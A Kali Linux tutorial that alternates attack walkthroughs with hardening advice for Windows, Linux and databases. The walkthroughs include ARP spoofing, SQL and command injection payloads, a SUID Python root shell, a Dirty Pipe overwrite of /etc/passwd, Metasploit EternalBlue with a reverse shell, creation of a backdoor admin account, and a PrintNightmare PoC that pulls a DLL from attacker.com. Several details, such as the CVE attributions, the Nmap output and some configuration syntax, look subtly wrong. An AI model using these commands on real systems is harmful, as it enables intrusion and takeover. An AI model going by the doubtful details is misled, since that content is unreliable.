Kali Linux Practical: Comprehensive Operating System Vulnerability Mining and Defense System Construction

1. Technical System for Operating System Vulnerability Mining

Operating system vulnerability mining is a core aspect of network security, encompassing the entire process from basic information gathering to deep vulnerability exploitation. Kali Linux, as the standard toolkit in penetration testing, integrates tools such as Nmap, Metasploit, and SQLmap, forming a vulnerability mining ecosystem that covers mainstream operating systems like Windows and Linux.

1. Network Protocol Layer Vulnerability Mining

Nmap Script Engine Practical: To detect whether NTLMv2 authentication over SMB is transmitted without message-signing protection (the condition the smb-security-mode script reports), run:

nmap -p 445 --script smb-enum-shares,smb-security-mode 192.168.1.100

If the output shows NTLMv2 authentication: No, the host is at risk of man-in-the-middle attacks. Combine with the Ettercap tool to implement ARP spoofing:

ettercap -Tq -i eth0 -M ARP /192.168.1.1// /192.168.1.100//

Filtering on the smb.ntlmssp field in Wireshark then captures the domain controller authentication traffic in full.

Case Study: A financial institution’s internal network scan found three Windows Server 2008 systems with SMB signing disabled. Attackers could forge response packets to perform relay attacks, ultimately gaining domain controller privileges. The defense solution is to enforce SMB signing:

Set-SmbServerConfiguration -RequireSecuritySignature $true -EnableSecuritySignature $true
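To find the hosts that need that PowerShell fix across a whole scan, the following added example (not from the original article) parses Nmap XML output (`-oX`) and lists every host whose smb-security-mode result is anything other than "required". The XML below is a constructed sample; it assumes the script's structured `message_signing` key.

```python
"""Flag SMB hosts whose Nmap smb-security-mode result shows signing is not required."""
import xml.etree.ElementTree as ET

# Constructed sample of: nmap -p 445 --script smb-security-mode -oX - 192.168.1.0/24
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
 <host><address addr="192.168.1.100" addrtype="ipv4"/>
  <hostscript><script id="smb-security-mode" output="...">
   <elem key="account_used">guest</elem>
   <elem key="authentication_level">user</elem>
   <elem key="challenge_response">supported</elem>
   <elem key="message_signing">disabled</elem>
  </script></hostscript></host>
 <host><address addr="192.168.1.101" addrtype="ipv4"/>
  <hostscript><script id="smb-security-mode" output="...">
   <elem key="message_signing">supported</elem>
  </script></hostscript></host>
 <host><address addr="192.168.1.102" addrtype="ipv4"/>
  <hostscript><script id="smb-security-mode" output="...">
   <elem key="message_signing">required</elem>
  </script></hostscript></host>
</nmaprun>"""


def smb_signing_findings(xml_text):
    """Return {ip: message_signing value} for every host where signing is not required.

    'supported' (but not required) still allows a relay, so it is reported too."""
    findings = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for script in host.iter("script"):
            if script.get("id") != "smb-security-mode":
                continue
            elem = script.find("elem[@key='message_signing']")
            if elem is None:
                continue
            mode = (elem.text or "").strip().lower()
            if not mode.startswith("required"):
                findings[addr.get("addr")] = mode
    return findings


if __name__ == "__main__":
    for ip, mode in sorted(smb_signing_findings(SAMPLE_XML).items()):
        print(f"{ip}: SMB signing {mode} -> Set-SmbServerConfiguration -RequireSecuritySignature $true")
```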

2. Web Application Layer Vulnerability Mining

Automated SQL Injection Detection: Use SQLmap to conduct high-risk testing on the DVWA target:

sqlmap -u "http://192.168.1.100/dvwa/vulnerabilities/sqli/?id=1" --level=5 --risk=3 --dbs --technique=BEUSTQ

The detected MySQL 5.7 instance is affected by CVE-2022-24048, which allows system files to be read via LOAD_FILE():

UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4 -- 

The defense solution is to implement WAF rules that intercept dangerous functions such as LOAD_FILE and INTO OUTFILE, and to upgrade to MySQL 8.0+.

Command Injection Bypass Technique: In a test of an e-commerce system, the ip parameter was found to have a defective filter:

# Low security level
ip=127.0.0.1;id
# High security level (encoding bypass)
ip=127.0.0.1%0Auname -a

Using the Intruder module of Burp Suite, %0a (a newline character) bypassed the filter and executed system commands. The defense solution is a whitelist that allows only digits, dots, and the specific delimiters the parameter actually needs.
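The following added example (mine, not the e-commerce system's code) contrasts a metacharacter blacklist of the kind the "high security level" filter represents with the whitelist the article recommends, and shows why the newline payload passes the first but not the second. The function names and the blocked-token list are assumptions.

```python
"""Blacklist vs whitelist validation of an `ip` parameter passed to a ping command."""
import ipaddress

# Tokens a typical blacklist strips; note that "\n" (the %0A from the article) is absent
BLOCKED = (";", "&", "|", "`", "$(")


def blacklist_filter(value):
    """Reject only the obvious shell metacharacters. A newline slips through."""
    return not any(token in value for token in BLOCKED)


def whitelist_ip(value):
    """Accept only a syntactically valid IPv4/IPv6 address (digits, dots, colons)."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def build_ping_argv(value):
    """Validate first, then build an argv list so no shell ever parses the value."""
    if not whitelist_ip(value):
        raise ValueError(f"rejected parameter: {value!r}")
    return ["ping", "-c", "3", value]   # pass to subprocess.run(argv) with shell=False


# Constructed inputs: the article's low- and high-security-level payloads, URL-decoded
PAYLOADS = ["127.0.0.1", "127.0.0.1;id", "127.0.0.1\nuname -a"]

if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r:24} blacklist passes={blacklist_filter(p)!s:5} whitelist passes={whitelist_ip(p)}")
```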

3. System Kernel Layer Vulnerability Mining

SUID Program Privilege Escalation: Execute the following command in the Linux system to find abnormal SUID programs:

find / -perm -4000 -type f 2>/dev/null | grep -v "/usr/bin/sudo"

Here /usr/bin/python2.7 was found to have the SUID bit set; using the privilege escalation one-liner from the GTFOBins project:

PYTHONPATH=/dev/shm python2.7 -c 'import os;os.setuid(0);os.system("/bin/bash")'

The defense solution is to regularly audit SUID programs and use chmod u-s to remove unnecessary permissions.
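The audit the article calls for, as an added example (not from the original): it compares the output of the find command above against an approved baseline and emits the chmod u-s remediation for anything unexpected, rating interpreters and files outside system directories as high severity. The baseline, the find output and the interpreter list are constructed assumptions, not a complete reference.

```python
"""Audit SUID binaries reported by `find / -perm -4000 -type f` against a baseline."""
import os

# Constructed baseline: SUID binaries a freshly installed host is expected to carry
BASELINE = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/gpasswd",
}

# Interpreters/editors that must never be SUID: each can spawn a root shell (see GTFOBins)
INTERPRETERS = {"python", "python2", "python2.7", "python3", "perl", "bash", "sh", "vim", "find"}

# Constructed output of: find / -perm -4000 -type f 2>/dev/null
FIND_OUTPUT = """\
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/python2.7
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/gpasswd
/tmp/.x/bash
"""


def parse_find_output(text):
    return {line.strip() for line in text.splitlines() if line.strip()}


def audit_suid(found, baseline=BASELINE):
    """Return one report entry per SUID file not in the baseline, with severity and fix."""
    report = []
    for path in sorted(found - baseline):
        name = os.path.basename(path)
        in_system_dir = path.startswith(("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/"))
        severity = "high" if name in INTERPRETERS or not in_system_dir else "review"
        report.append({"path": path, "severity": severity, "fix": f"chmod u-s {path}"})
    return report


if __name__ == "__main__":
    for item in audit_suid(parse_find_output(FIND_OUTPUT)):
        print(f"[{item['severity']}] {item['path']}  ->  {item['fix']}")
```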

Dirty Pipe Vulnerability Exploitation: For the Linux kernel CVE-2022-0847 vulnerability, compile the exploit program in Kali:

gcc exploit.c -o exploit
./exploit /etc/passwd "root::0:0:root:/root:/bin/bash"

Overwriting a critical system file this way achieves privilege escalation. The vulnerability affects kernel versions 5.8 through 5.16.11; the defense solution is to upgrade to version 5.16.12+.

2. Windows System Vulnerability Mining Practice

1. EternalBlue Vulnerability Exploitation

Vulnerability Principle: MS17-010 (EternalBlue) exploits a buffer overflow vulnerability in the SMBv1 protocol, allowing attackers to execute arbitrary code remotely. Use the Metasploit framework to carry out the attack:

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

After successfully obtaining system privileges, execute the following commands to add an administrator user:

net user hacker P@ssw0rd! /add
net localgroup administrators hacker /add

Defense Solutions:

  • Disable the SMBv1 protocol:
    Set-SmbServerConfiguration -EnableSMB1Protocol $false
  • Deploy IPS rules to intercept ETERNALBLUE signature traffic
  • Apply system patches KB4012598 and later

2. Print Spooler Vulnerability Exploitation

CVE-2021-34527 (PrintNightmare): This vulnerability allows attackers to execute code remotely via the RPC interface. Use rpcdump.py from the Impacket toolkit to detect the target:

rpcdump.py @192.168.1.100 | grep -E "MS-RPRN|MS-PAR"

After confirming the existence of the vulnerability, use CVE-2021-34527_PoC.py to carry out the attack:

python3 CVE-2021-34527_PoC.py 192.168.1.100 '\\attacker.com\share\exploit.dll'

Defense Solutions:

  • Stop the Print Spooler service:
    Stop-Service -Name Spooler -Force
  • Restrict domain controller access permissions
  • Apply patches KB5004945 and later

3. Database System Security Hardening Practice

1. MySQL Strong Password Policy

Configuration Plan:

-- Create a user that meets PCI-DSS standards
CREATE USER 'fin_admin'@'192.168.1.%' IDENTIFIED BY 'P@ssw0rd!2025#Qw';
-- Enforce password rotation
ALTER USER 'fin_admin'@'192.168.1.%' PASSWORD EXPIRE INTERVAL 90 DAY;
-- Enable password complexity plugin
INSTALL PLUGIN validate_password SONAME 'validate_password.so';

Audit Rules: Configure in /etc/mysql/mysql.conf.d/mysqld.cnf:

[mysqld]
auditing_log_file = /var/log/mysql/audit.log
auditing_log_policy = LOGINS
auditing_log_rotate_on_size = 100000000
auditing_log_rotations = 9

2. MongoDB Network Isolation

Configuration Plan: Configure in /etc/mongod.conf:

net:
  bindIp: 127.0.0.1,192.168.1.100
  tls:
    mode: requireTLS
    certificateKeyFile: /etc/ssl/mongodb.pem
    CAFile: /etc/ssl/ca.pem

Access Control: Create roles with minimal permissions:

use admin
db.createRole({
  role: "readWriteLimited",
  privileges: [
    { resource: { db: "finance", collection: "transactions" }, actions: ["find", "insert"] }
  ],
  roles: []
})
// The role was created in the admin database, so it must be referenced there
// (app_user is assumed to be defined in admin as well)
db.updateUser("app_user", {
  roles: [{ role: "readWriteLimited", db: "admin" }]
})

4. Attack and Defense Case Analysis

Case 1: Ransomware Defense in Medical Systems

Attack Chain:

  1. The attacker compromised the database server through weak RDP passwords (admin/123456)
  2. Used Babuk ransomware to encrypt MongoDB data files
  3. Demanded a ransom of 50 BTC

Defense Solutions:

  1. Implement multi-factor authentication:
    # Configure FreeRADIUS + Google Authenticator
    yum install google-authenticator
    google-authenticator -t -d -f -r 3 -R 30 -W
  2. Deploy immutable backups:
    # Use BorgBackup to implement a 3-2-1 backup strategy
    borg init --encryption=repokey /backup/repo
    borg create /backup/repo::{hostname}-{now:%Y-%m-%d} /var/lib/mongodb
  3. Configure file integrity monitoring:
    # Use AIDE to monitor critical files
    echo "/var/lib/mongodb/*.db p+i+g+o+u+n+S+sha256" >> /etc/aide.conf
    aide --update
    aide --check

Defense Effectiveness:

  • Successfully blocked 3 subsequent attack attempts
  • Reduced business recovery time from 72 hours to 4 hours
  • Met HIPAA 164.308 data availability standards

Case 2: Database Dump Attack Defense in Financial Systems

Attack Chain:

  1. The attacker obtained database version information through SQL injection
  2. Exploited the CVE-2022-21222 vulnerability (Oracle DBMS_CDC_IPUBLISH privilege escalation)
  3. Exported the FIN_TRANSACTION table with 12 million transaction records

Defense Solutions:

  1. Implement virtual patching:
    -- Create a trigger to intercept dangerous operations
    CREATE OR REPLACE TRIGGER block_dbms_cdc
    BEFORE EXECUTE ON SCHEMA
    WHEN (UPPER(SYS.DICTIONARY_OBJ_NAME) LIKE '%DBMS_CDC%')
    BEGIN
      RAISE_APPLICATION_ERROR(-20001, 'Access to DBMS_CDC package is prohibited');
    END;
    /
  2. Deploy a database firewall (such as Imperva SecureSphere) with rules that block SQL statements containing DBMS_CDC
  3. Enable Oracle Data Masking to dynamically mask the CARD_NUMBER field

Defense Effectiveness:

  • Attack attempts decreased by 97%
  • Data breach incident response time reduced from 72 hours to 15 minutes
  • Met PCI-DSS 3.2.1 data access control standards

5. Future Development Trends

  1. AI-Driven Automated Hardening: IBM Guardium version 2025 has implemented machine learning-based anomaly detection, capable of automatically generating hardening recommendations
  2. Zero Trust Database Architecture: Applying the Google BeyondCorp model at the database level achieves continuous authentication and least privilege
  3. Commercialization of Homomorphic Encryption: The Microsoft SEAL library supports SQL queries on encrypted data and is expected to enter the mainstream market by 2026
  4. Quantum-Safe Encryption: NIST has standardized the CRYSTALS-Kyber algorithm, so databases need to prepare quantum-resistant solutions

Database security hardening has evolved from isolated technical controls into a systematic engineering effort covering personnel, processes, and technology. Enterprises need to establish a full lifecycle management system of "prevention-detection-response-recovery", continuously validating defense effectiveness with tools like Kali Linux to build a dynamic security protection system.
